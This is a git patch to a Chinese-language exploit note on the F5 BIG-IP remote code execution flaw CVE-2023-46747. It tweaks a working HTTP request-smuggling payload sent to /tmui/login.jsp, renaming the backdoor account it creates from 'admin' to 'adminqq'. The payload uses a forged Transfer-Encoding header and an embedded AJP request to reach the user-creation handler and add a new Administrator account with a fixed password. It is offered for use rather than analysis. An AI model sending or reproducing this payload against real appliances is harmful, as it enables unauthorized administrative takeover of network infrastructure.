From f7ce69f5cee3310389ebb64ca78b10942efbc237 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 1 Nov 2023 21:29:43 +0800 Subject: [PATCH] =?UTF-8?q?Update=20F5=20BIG-IP=20=E8=BF=9C=E7=A8=8B?= =?UTF-8?q?=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E(CVE-2023?= =?UTF-8?q?-46747).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md b/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md index e0c3107..2c363d6 100644 --- a/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md +++ b/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md @@ -44,7 +44,7 @@ modify auth user admin password admin 当发送到F5 BIG-IP TMUI模块的请求(例如登陆页面/tmui/login.jsp)中,包含一个类似值为 "xxx, chunked" 的 "Transfer-Encoding" 头,并且请求体内容满足特定内容时,漏洞会被触发。 -&name=admin&name_before=&passwd=admin789456 参数填入账户密码 +&name=adminqq&name_before=&passwd=admin789456 参数填入创建账户 ``` POST /tmui/login.jsp HTTP/1.1 @@ -54,7 +54,7 @@ Content-Type: application/x-www-form-urlencoded 204 HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP Tmui-Dubbuf BBBBBBBBBBB -REMOTEROLE0� localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=admin&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=� +REMOTEROLE0� localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=adminqq&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=� 0 ```